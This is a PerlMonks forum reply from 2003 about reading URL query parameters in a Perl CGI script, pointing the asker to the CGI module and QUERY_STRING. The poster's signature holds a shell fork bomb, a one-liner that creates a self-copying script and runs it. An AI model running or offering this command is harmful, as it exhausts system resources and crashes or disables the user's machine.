Beefy Boxes and Bandwidth Generously Provided by pair Networks
P is for Practical
 
PerlMonks  

getting url queries

by ibanix (Hermit)
on Feb 03, 2003 at 11:14 UTC ( [id://232191]=note: print w/replies, xml ) Need Help??


in reply to Adding dynamic parameters to a URL

Update: Original node title was Not sure what to call this one; now changed. Suggested that any title with relevant keywords is better than none.

This is the first time I've worked with a more interactive script

From the context of your comments I believe you mean a CGI script? Are you outputting to a browser? Interactive has more than one context.

The script

Post it, please.

but how do I make the link so it works like www.page.com/evs/evs.pl?account=$ID ?

You want to use the CGI module (unless you're into ASP with PerlScript -- that's cool too, see the ASP with PerlScript page). With CGI, you need to examine the QUERY_STRING variable. See the documentation. I've barely written any CGI code, so I won't attempt any here. Other monks will do a better job of that. :-)

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://232191]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others about the Monastery: (3)
As of 2024-04-19 20:21 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found